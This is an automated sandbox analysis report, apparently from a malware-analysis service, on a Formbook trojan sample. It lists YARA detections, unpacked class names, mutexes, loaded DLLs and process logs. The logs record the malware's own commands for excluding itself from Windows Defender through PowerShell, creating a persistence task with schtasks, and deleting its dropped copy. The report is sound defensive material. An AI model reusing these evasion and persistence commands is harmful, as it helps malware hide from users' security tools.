Source: 00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: po8909893299832.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: InXlDTKncKkCk.exe PID: 8096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: InXlDTKncKkCk.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 6360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cscript.exe PID: 5188, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: po8909893299832.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: InXlDTKncKkCk.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, WsLMVTlHEp0AB3VIJd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: _0020.SetAccessControl
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: _0020.AddAccessRule
Source: 0.2.po8909893299832.exe.6b10000.6.raw.unpack, WsLMVTlHEp0AB3VIJd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: _0020.SetAccessControl
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.po8909893299832.exe.3891dc0.3.raw.unpack, JfpsmYXLTXSZHXDVdB.cs	Security API names: _0020.AddAccessRule

Source: 0.2.po8909893299832.exe.50a0000.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 11.2.InXlDTKncKkCk.exe.2c23370.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.po8909893299832.exe.2533334.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.po8909893299832.exe.254334c.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: explorer.exe, 0000001C.00000003.2581754198.0000000004971000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431674924.0000000004980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506605753.0000000004980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2514268109.0000000004971000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2430282312.0000000004980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2535542701.0000000004971000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2434780079.0000000004980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2556514370.0000000004971000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2436035754.0000000004980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3702322334.0000000004969000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.000000000496B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.evad.winEXE@30/15@12/4

Source: C:\Users\user\Desktop\po8909893299832.exe

File created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Mutant created: \Sessions\1\BaseNamedObjects\TmecPhWnVRdVpNSnuOXSXu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03

Source: C:\Users\user\Desktop\po8909893299832.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6E21.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\explorer.exe

Source: po8909893299832.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: po8909893299832.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\po8909893299832.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\po8909893299832.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: po8909893299832.exe	ReversingLabs: Detection: 47%
Source: po8909893299832.exe	Virustotal: Detection: 48%

Source: po8909893299832.exe

String found in binary or memory: -------------------------------------ADD Student Record-------------------------------------

Source: C:\Users\user\Desktop\po8909893299832.exe

File read: C:\Users\user\Desktop\po8909893299832.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\po8909893299832.exe "C:\Users\user\Desktop\po8909893299832.exe"
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Users\user\Desktop\po8909893299832.exe "C:\Users\user\Desktop\po8909893299832.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3040
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Process created: C:\Users\user\Desktop\po8909893299832.exe "C:\Users\user\Desktop\po8909893299832.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe	Process created: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe"

Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\po8909893299832.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
